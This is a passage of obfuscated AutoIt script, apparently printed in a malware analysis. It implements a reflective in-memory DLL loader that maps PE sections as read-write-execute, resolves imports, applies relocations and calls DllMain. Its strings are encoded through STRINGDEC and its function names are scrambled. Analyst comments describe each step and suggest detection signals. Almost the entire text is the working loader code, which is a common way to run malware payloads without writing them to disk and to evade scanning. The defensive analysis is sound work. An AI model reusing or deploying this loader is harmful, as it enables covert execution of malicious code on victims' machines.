hlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDE
C("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("fxdtghgofffvfipskrarjwglsumils","15,-15,10,0,-49,-52,-71,-28,3,20,-1,-39,0,-22,4,-18,-8,-7,-15,-13,9,-18,11,10,-14,-58")&STRINGDEC("vtrecaeijykmcbhuwuatuvngilhwbv","-1,-11,-4,15,-45,-45,-69,-22,-1,1,-6,-30,3,-15,12,-20,-20,-10,-30,-5,-8,-9,-5,13,-46")&STRINGDEC("iaovcgmbsqfyywjjupuzspzasjjwmm","12,8,-1,-2,-45,-51,-77,-15,-10,9,-1,-42,-19,-47,-5,-9,-5,-30,-16,-7,-14,2,-4,4,-56")&STRINGDEC("zldnfbilropcisfeguxfrysgszpxxg","-5,-3,10,6,-48,-46,-73,-25,-9,11,-11,-20,-3,-43,-1,-4,9,-50,-9,7,-5,-16,1,-44")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
- $PPOINTER+=112
- ELSE
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- ENDIF
- ; SizeOfImage, AddressOfEntryPoint and the preferred ImageBase drive the
- ; allocation, the final DllMain call and the relocation delta respectively.
- LOCAL $ISIZEOFIMAGE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("zsegnrzltluwowczdwtnhmfmrwgesz","-39,-10,21,-2,-31,-12,-49,1,-19,-5,-16"))
- LOCAL $IENTRYPOINT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("ecaylgmvcgunqzdwlwowleyvvmqubq","-36,1,3,-7,-7,12,6,-39,3,-34,-7,6,1,-1,-20,-8,-3,-9,5"))
- LOCAL $POPTIONALHEADERIMAGEBASE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("piklccodxnprxusmndogiunpucofod","-39,4,-10,-5,2,-33,-14,15,-19"))
- ; Data directories (8 bytes each): skip [0] export, read [1] import, skip three
- ; more, read [5] base relocation, then skip the remaining ten (80 bytes) to land
- ; on the section headers. Offsets are hard-coded, not taken from NumberOfRvaAndSizes.
- $PPOINTER+=8
- LOCAL $TIMAGE_DIRECTORY_ENTRY_IMPORT=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
- LOCAL $PADDRESSIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- LOCAL $ISIZEIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
- $PPOINTER+=8
- $PPOINTER+=24
- LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
- LOCAL $PADDRESSNEWBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- LOCAL $ISIZEBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
- $PPOINTER+=8
- $PPOINTER+=40
- $PPOINTER+=40
- ; $BCLEANLOAD: NtUnmapViewOfSection on address 0 (see UNMAPVIEWOFSECTION); its
- ; result only decides whether FreeLibrary runs at the very end. The intent is not
- ; clear from this paste -- presumably the call fails and the flag stays False.
- ; The whole image is allocated read/write first; sections are made RWX below.
- LOCAL $PBASEADDRESS=0
- LOCAL $BCLEANLOAD=$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT($PBASEADDRESS)
- $PBASEADDRESS=$BYPASSKERNELROOTADMINISTRATION($PBASEADDRESS,$ISIZEOFIMAGE,$MEM_RESERVE+$MEM_COMMIT,$PAGE_READWRITE)
- ; Copy SizeOfHeaders bytes of headers into the new base; the region is set RW
- ; explicitly and on failure the allocation is released with @error 6.
- LOCAL $PHEADERSNEW=$HOOKROOTKERNELROOTHOOK($TIMAGE_DOS_HEADER)
- LOCAL $IOPTIONALHEADERSIZEOFHEADERS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("uajndgscxoaqvmpmlewkyvswvbncum","-34,8,16,-9,-21,-1,-43,2,-23,-11,4,1,-3"))
- $BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS,$IOPTIONALHEADERSIZEOFHEADERS,$PAGE_READWRITE)
- IF @ERROR THEN
- $KERNELROOTROOTKERNELKERNEL($PBASEADDRESS)
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(6,0,0)
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PBASEADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PHEADERSNEW),1))
- ; Section loop: for each 40-byte IMAGE_SECTION_HEADER, zero VirtualSize bytes at
- ; base+VirtualAddress (the copy from a fresh, pointer-less struct yields zeros),
- ; then copy min(SizeOfRawData, VirtualSize) bytes of raw data there. Every section
- ; is set PAGE_EXECUTE_READWRITE regardless of its own characteristics; if that
- ; fails the section is skipped silently. The section holding the import table is
- ; handed to FIXIMPORTS immediately; the one holding the relocation table is
- ; remembered in $TRELOCRAW for FIXRELOC after the loop.
- LOCAL $TIMAGE_SECTION_HEADER
- LOCAL $ISIZEOFRAWDATA,$PPOINTERTORAWDATA
- LOCAL $IVIRTUALSIZE,$IVIRTUALADDRESS
- LOCAL $TIMPRAW,$TRELOCRAW
- FOR $I=1 TO $INUMBEROFSECTIONS
- $TIMAGE_SECTION_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("mojpoyssdxtpuzqpcnsiwelefhzgya","-10,-7,-9,2,-79,-43,-18,-6,1,-29,-60,-19,-58")&STRINGDEC("vbldanmbhcsltynkaortgbgkjuimps","-18,21,3,14,3,-78,-23,7,10,17,2,-11,-8,-38,-5,15,4,-52")&STRINGDEC("kkvvvluofzqkzuepcoybcytubbiggv","-7,12,-7,-4,-18,-76,-31,-6,12,-6,4,-10,-14,-52,-1,-12,15,-10,-6,17,-40")&STRINGDEC("qetrjgnlxlvegjkdznybdrcuijzsol","-13,18,-5,0,-6,-71,-27,-3,2,-7,-39,1,-21,-9,12,-32,-25,6,-24,-39")&STRINGDEC("blvsrzcrailshptfaqyyeetseetdbz","2,11,-7,-1,-14,-90,-19,-3,8,5,8,-14,10,-28,-5,-20,0,6,-53,-24,15,-4,-57")&STRINGDEC("tqkctmpbsvhhkdkgmqnibxhpkatykb","-16,6,4,15,-16,-77,-32,13,-10,-8,12,-3,7,-16,4,-21,-8,-5,1,-6,-1,-4,1,-1,3,18,-57")&STRINGDEC("nhnevjsryrvozfdrhezcxeomkkmhus","-10,15,1,13,-18,-74,-35,-3,-16,-4,-2,-10,-8,-18,11,-38,1,9,-21,11,-3,8,-13,-8,7,8,-50")&STRINGDEC("rqejsmymxcjnxkzbsbxujapidccihv","5,-2,13,-6,-83,-31,-4,0,-22,2,8,-31,-18,-25,-21,10,-4,1,-23,-1,-1,14,-2,10,-41")&STRINGDEC("sgnndtmmzqymlnyidyqlpxkocogaza","4,8,4,-10,-68,-38,8,0,-24,-12,-7,-30,-6,-34,-16,5,1,-11,4,1,-14,-19,7,4,-40")&STRINGDEC("hupkjmgzcrxevtxtowwoteiqwftdex","-4,2,-1,7,-6,-77,-36,-18,-2,0,-23,-2,-2,-15,-6,-11,4,-3,-14,-12,-1"),$PPOINTER)
- $ISIZEOFRAWDATA=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("lohkljtmkwobrarxhbfwcbacdanqnx","-25,-6,18,-6,-29,-4,-34,-12,12,-51,-14,18,-17"))
- $PPOINTERTORAWDATA=$PHEADERSNEW+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("xttkphmeylgmqkmwftqcvvtehxhceq","-40,-5,-11,3,4,-3,5,-17,-10,-26,-6,10,-45,-10,7,-22"))
- $IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- $IVIRTUALSIZE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("bolwjztsooyqtkwojkfjcewunjrbrl","-12,-6,6,-3,11,-25,-8,-32,-6,11,-20"))
- IF $IVIRTUALSIZE AND $IVIRTUALSIZE<$ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA=$IVIRTUALSIZE
- $BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS+$IVIRTUALADDRESS,$IVIRTUALSIZE,$PAGE_EXECUTE_READWRITE)
- IF @ERROR THEN
- $PPOINTER+=40
- CONTINUELOOP
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]"),1))
- IF $ISIZEOFRAWDATA THEN
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PPOINTERTORAWDATA),1))
- ENDIF
- IF $IVIRTUALADDRESS<=$PADDRESSIMPORT AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSIMPORT THEN
- $TIMPRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEIMPORT&"]",$PPOINTERTORAWDATA+($PADDRESSIMPORT-$IVIRTUALADDRESS))
- $BYPASSKERNELEXPLOITKERNEL($TIMPRAW,$PBASEADDRESS)
- ENDIF
- IF $IVIRTUALADDRESS<=$PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSNEWBASERELOC THEN
- $TRELOCRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEBASERELOC&"]",$PPOINTERTORAWDATA+($PADDRESSNEWBASERELOC-$IVIRTUALADDRESS))
- ENDIF
- $PPOINTER+=40
- NEXT
- ; Relocations are applied once all sections are in place; delta is
- ; (new base - preferred ImageBase), 64-bit entries when Magic was 523.
- IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION($TRELOCRAW,$PBASEADDRESS,$POPTIONALHEADERIMAGEBASE,$IMAGIC=523)
- ; DllCallAddress("bool", entry, "ptr", base, "dword", 1, "ptr", 0), i.e.
- ; DllMain(hModule, DLL_PROCESS_ATTACH, NULL); the type strings are the decoded
- ; STRINGDEC values. The return value is ignored.
- LOCAL $PENTRYFUNC=$PBASEADDRESS+$IENTRYPOINT
- IF $IENTRYPOINT THEN $ADMINISTRATIONADMINISTRATIONBYPASSHOOK(STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),$PENTRYFUNC,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PBASEADDRESS,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),1,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),0)
- ; Odd: FreeLibrary on a manually mapped region, and only when $BCLEANLOAD is True.
- IF $BCLEANLOAD THEN $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION($PBASEADDRESS)
- ENDFUNC
- ; Apply base relocations. $TDATA holds the raw relocation table, $PADDRESSNEW
- ; the actual mapping base, $PADDRESSOLD the preferred ImageBase, $FIMAGEX64 True
- ; for PE32+. Walks IMAGE_BASE_RELOCATION blocks (8-byte header followed by
- ; 2-byte entries; count = (SizeOfBlock - 8) / 2). Entry type is the high 4 bits
- ; (BitShift 12), the page offset the low 12 bits (BitAND 4095). Only type 3
- ; (IMAGE_REL_BASED_HIGHLOW) or, for x64, type 10 (IMAGE_REL_BASED_DIR64) is
- ; patched -- $IFLAG = 3 + 7*$FIMAGEX64 -- by adding the delta to the
- ; pointer-sized value at new+VirtualAddress+offset. Other entry types (e.g. the
- ; type-0 padding entries) are ignored. Always returns 1.
- ; $IRELATIVEMOVE starts uninitialised and is effectively 0 in the first
- ; WHILE comparison.
- FUNC FIXRELOC($TDATA,$PADDRESSNEW,$PADDRESSOLD,$FIMAGEX64)
- LOCAL $IDELTA=$PADDRESSNEW-$PADDRESSOLD
- LOCAL $ISIZE=$KERNELROOTKERNELHOOKKERNELROOT($TDATA)
- LOCAL $PDATA=$HOOKROOTKERNELROOTHOOK($TDATA)
- LOCAL $TIMAGE_BASE_RELOCATION,$IRELATIVEMOVE
- LOCAL $IVIRTUALADDRESS,$ISIZEOFBLOCK,$INUMBEROFENTRIES
- LOCAL $TENRIES,$IDATA,$TADDRESS
- LOCAL $IFLAG=3+7*$FIMAGEX64
- WHILE $IRELATIVEMOVE<$ISIZE
- $TIMAGE_BASE_RELOCATION=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("lwjrdmzzfbhfvidpgcrfuusyhqgqwo","-8,0,5,0,0,-77,-36,-17,12,18,13,-5,-10,-40,0,-12,11,2,1,13,-58,-85,-15,-2,7,1,-3,-81,-36,-6,14,-18,-27,-12,-34,-1,-11,-23,5"),$PDATA+$IRELATIVEMOVE)
- $IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
- $ISIZEOFBLOCK=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("bnuwrciljwllofmmhxrxtcxcwgidkq","-15,-5,5,-18,-35,3,-39,0,5,-20,-1"))
- $INUMBEROFENTRIES=($ISIZEOFBLOCK-8)/2
- ; word[n] view over the entries that follow the 8-byte block header.
- $TENRIES=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ljdrmcjigcsrmjeayaoxiftpaygyrv","11,5,14,-14,-18")&$INUMBEROFENTRIES&"]",$HOOKROOTKERNELROOTHOOK($TIMAGE_BASE_RELOCATION)+8)
- FOR $I=1 TO $INUMBEROFENTRIES
- $IDATA=$KERNELBYPASSROOTADMINISTRATION($TENRIES,1,$I)
- IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($IDATA,12)=$IFLAG THEN
- $TADDRESS=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESSNEW+$IVIRTUALADDRESS+$BYPASSBYPASSHOOKEXPLOIT($IDATA,4095))
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TADDRESS,1,$KERNELBYPASSROOTADMINISTRATION($TADDRESS,1)+$IDELTA)
- ENDIF
- NEXT
- $IRELATIVEMOVE+=$ISIZEOFBLOCK
- WEND
- RETURN 1
- ENDFUNC
- ; Resolve the import table in place. $TDATA is the raw import directory,
- ; $HINSTANCE the mapping base. For each 20-byte IMAGE_IMPORT_DESCRIPTOR, until
- ; the FirstThunk RVA (decoded field name "RVAFirstThunk") is 0:
- ;   - read the module name (char[] at base + "RVAModuleName") and LoadLibrary it;
- ;   - walk the OriginalFirstThunk array ("RVAOriginalFirstThunk"), falling back
- ;     to FirstThunk when that RVA is 0;
- ;   - a thunk whose top bit is set (IMAGE_ORDINAL_FLAG; tested by taking the
- ;     highest byte with BinaryMid and BitShift 7) is an ordinal import resolved
- ;     with GetProcAddress(BitAND 0xFFFF); otherwise it is an RVA to an
- ;     IMAGE_IMPORT_BY_NAME whose Name string starts at +2;
- ;   - write the resolved address into the corresponding FirstThunk slot
- ;     (pointer-sized, $IPTRSIZE).
- ; Neither LoadLibrary nor GetProcAddress results are checked: a failed lookup
- ; stores 0 in the IAT slot, and loaded module handles are never released.
- ; Always returns 1.
- ; Detection: a burst of LoadLibrary/GetProcAddress calls from the AutoIt
- ; process right after the RWX section writes in DLLFROMMEMORY.
- FUNC FIXIMPORTS($TDATA,$HINSTANCE)
- LOCAL $PIMPORTDIRECTORY=$HOOKROOTKERNELROOTHOOK($TDATA)
- LOCAL $HMODULE,$PFUNCNAME,$TFUNCNAME,$SFUNCNAME,$PFUNCADDRESS
- LOCAL $TIMAGE_IMPORT_MODULE_DIRECTORY,$PMODULENAME,$TMODULENAME
- LOCAL $TBUFFEROFFSET2,$IBUFFEROFFSET2
- LOCAL $IINITIALOFFSET,$IINITIALOFFSET2,$IOFFSET
- ; Size of a "ptr" struct member: 4 or 8 depending on interpreter bitness.
- LOCAL CONST $IPTRSIZE=$KERNELROOTKERNELHOOKKERNELROOT($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4")))
- WHILE 1
- $TIMAGE_IMPORT_MODULE_DIRECTORY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("oslxljafhlcqevhnveycpapujzmbxp","-11,4,3,-6,-8,-74,-15,-16,-39,-29,15,-8,2,-13,6,-13,-10,-31,-16,15,3,19,-28,-13,11,-12,-2,-39")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("dhbrrjgfaqtelpmlwzkkhrxzhyhysq","0,15,13,0,-14,-74,-33,9,17,6,-19,13,-8,-11,5,-41,-15,-25,-2,3,-45")&STRINGDEC("dilcwosqkyuaqkznzozwybrpzcyodc","0,14,3,15,-19,-79,-33,-27,-42,-44,-6,3,4,1,-21,-32,-25,-2,-21,-60")&STRINGDEC("usmbngezbsbjfvccnqokanpjizqujz","-17,4,2,16,-10,-71,-19,-36,-33,-45,7,8,13,-2,-15,5,7,-3,-4"),$PIMPORTDIRECTORY)
- IF NOT $KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))THEN EXITLOOP
- $PMODULENAME=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17"))
- $TMODULENAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("upjquvutslafzbgfjxkhknbxlzazrp","-18,-8,-9,1,-85,-40,-20,-7,-14,-17")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PMODULENAME)&"]",$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17")))
- $HMODULE=$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS($KERNELBYPASSROOTADMINISTRATION($TMODULENAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12")))
- $IINITIALOFFSET=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))
- $IINITIALOFFSET2=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("zfbhtwtfudtxfnayqiivdgxbknheos","-40,-16,-33,-25,-2,-14,-13,3,-7,-3,-8,-50,3,4,18,-5,-29,-1,12,-8,7"))
- IF $IINITIALOFFSET2=$HINSTANCE THEN $IINITIALOFFSET2=$IINITIALOFFSET
- $IOFFSET=0
- WHILE 1
- $TBUFFEROFFSET2=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET2+$IOFFSET)
- $IBUFFEROFFSET2=$KERNELBYPASSROOTADMINISTRATION($TBUFFEROFFSET2,1)
- IF NOT $IBUFFEROFFSET2 THEN EXITLOOP
- IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($KERNELEXPLOITADMINISTRATIONROOTROOT($IBUFFEROFFSET2,$IPTRSIZE,1),7)THEN
- $PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$BYPASSBYPASSHOOKEXPLOIT($IBUFFEROFFSET2,65535))
- ELSE
- $PFUNCNAME=$HINSTANCE+$IBUFFEROFFSET2+2
- $TFUNCNAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ztupaktkcocqtjwswsimusgwiiaevm","-3,-5,-3,-12,-65,-28,-2,-7,6,-1,-2,-5,-57,-74,-20,-11,-22,-1,-73,-31,-20,-6,-2,-28")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PFUNCNAME)&"]",$HINSTANCE+$IBUFFEROFFSET2)
- $SFUNCNAME=$KERNELBYPASSROOTADMINISTRATION($TFUNCNAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12"))
- $PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$SFUNCNAME)
- ENDIF
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET+$IOFFSET),1,$PFUNCADDRESS)
- $IOFFSET+=$IPTRSIZE
- WEND
- $PIMPORTDIRECTORY+=20
- WEND
- RETURN 1
- ENDFUNC
- ; DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "handle",
- ; _WinAPI_GetCurrentProcess(), "ptr", $PADDRESS) -- the string arguments are the
- ; decoded STRINGDEC values. Returns True when the NTSTATUS in $ACALL[0] is 0,
- ; otherwise SetError(1, 0, False). Direct Nt* calls from a scripting runtime are
- ; themselves a useful hunting signal; here DLLFROMMEMORY passes address 0.
- FUNC UNMAPVIEWOFSECTION($PADDRESS)
- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("lolaswlneqglatvujvwqviroebtdfh","2,5,-8,11,-7,-73,-8,-2,7"),STRINGDEC("pzsmwgeaptrhqhifwxjgngsprkjntw","-7,-12,1"),STRINGDEC("egwadzchaebonrunjtdzissolfqgmo","-23,13,-34,13,9,-25,13,-18,8,0,21,-32,-8,-31,-16,-11,10,-11,11,-12"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$BYPASSHOOKHOOKHOOKKERNELHOOK(),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS)
- IF @ERROR OR $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,FALSE )
- RETURN TRUE
- ENDFUNC
- ; DllCall("kernel32.dll", "bool", "VirtualProtect", "ptr", $PADDRESS, "dword_ptr",
- ; $ISIZE, "dword", $IPROTECTION, "dword*", 0) -- strings decoded with STRINGDEC.
- ; The old-protection output value is discarded. Returns 1, or SetError(1, 0, 0)
- ; when the DllCall fails or VirtualProtect returns FALSE. DLLFROMMEMORY uses it
- ; with PAGE_READWRITE for the headers and PAGE_EXECUTE_READWRITE for every
- ; section; those RWX transitions are the thing to alert on.
- FUNC VIRTUALPROTECT($PADDRESS,$ISIZE,$IPROTECTION)
- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),STRINGDEC("wpxbildbjcxtjlduknwzcanprgheeu","-33,-7,-6,18,12,-11,8,-18,8,12,-4,-15,-7,8"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS,STRINGDEC("qquzgqwwlawbxandwwcglmgrcbifhj","-13,6,-6,-8,-3,-18,-7,-3,6"),$ISIZE,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),$IPROTECTION,STRINGDEC("nnpgmnrtuodmqfsmzcfvlmzjmztrro","-10,9,-1,11,-9,-68"),0)
- IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- RETURN 1
- ENDFUNC
- ; DllCall("kernel32.dll", "ptr", "GetProcAddress", "handle", $HMODULE, $STYPE,
- ; $VNAME) with $STYPE = "word" for an ordinal (IsNumber($VNAME)) and "str" for a
- ; name; strings decoded with STRINGDEC. Returns the resolved address, or
- ; SetError(1, 0, 0) when the call fails or yields NULL.
- FUNC GETPROCADDRESS($HMODULE,$VNAME)
- LOCAL $STYPE=STRINGDEC("zdacatdoylubvdmymbssbhfdsgsgol","-7,16,17")
- IF $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS($VNAME)THEN $STYPE=STRINGDEC("rygvobzahsfsgyffoyrxsigagjtisp","5,-10,11,-18")
